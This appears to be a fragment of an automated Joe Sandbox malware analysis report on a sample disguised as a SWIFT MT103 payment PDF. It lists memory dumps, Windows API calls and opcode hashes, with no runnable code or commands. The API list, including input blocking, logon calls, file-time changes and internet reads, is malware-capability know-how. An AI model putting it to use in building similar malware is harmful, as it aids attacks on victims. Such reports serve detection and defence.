                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                        • String ID:
                                                        • API String ID: 3539004672-0
                                                        • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                        • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                        • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                        • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                        APIs
                                                          • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                        • IsWindowVisible.USER32 ref: 00477314
                                                        • IsWindowEnabled.USER32 ref: 00477324
                                                        • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                        • IsIconic.USER32 ref: 0047733F
                                                        • IsZoomed.USER32 ref: 0047734D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                        • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                        • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                        • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                        • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                        • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                        • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                        • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _strncmp
                                                        • String ID: ACCEPT$^$h
                                                        • API String ID: 909875538-4263704089
                                                        • Opcode ID: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                                                        • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                        • Opcode Fuzzy Hash: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                                                        • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 3541575487-0
                                                        • Opcode ID: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                        • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                        • Opcode Fuzzy Hash: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                        • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                        • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                        • FindClose.KERNEL32(00000000), ref: 00436B13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                        • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                        • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                        • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                        APIs
                                                        • __time64.LIBCMT ref: 004433A2
                                                          • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                          • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID: rJ
                                                        • API String ID: 2893107130-1865492326
                                                        • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                        • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                        • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                        • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                        APIs
                                                        • __time64.LIBCMT ref: 004433A2
                                                          • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                          • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID: rJ
                                                        • API String ID: 2893107130-1865492326
                                                        • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                        • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                        • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                        • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                          • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                        • String ID:
                                                        • API String ID: 901099227-0
                                                        • Opcode ID: e127085a9b15cee707ec73158e963107b95b88d5e76ace2acbe067771b2a567b
                                                        • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                        • Opcode Fuzzy Hash: e127085a9b15cee707ec73158e963107b95b88d5e76ace2acbe067771b2a567b
                                                        • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                        • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                        • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                        • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                        • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0vH$HH
                                                        • API String ID: 0-728391547
                                                        • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                        • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                        • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                        • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID:
                                                        • API String ID: 2102423945-0
                                                        • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                        • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                        • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                        • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                        APIs
                                                        • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Proc
                                                        • String ID:
                                                        • API String ID: 2346855178-0
                                                        • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                        • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                        • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                        • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 0045A272
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                        • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                        • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                        • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                        • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                        • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                        • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                        • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                        • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                        • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                        • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                        • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                        • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                        • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                        • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                        • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                        • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                        • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                        • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                        Memory Dump Source
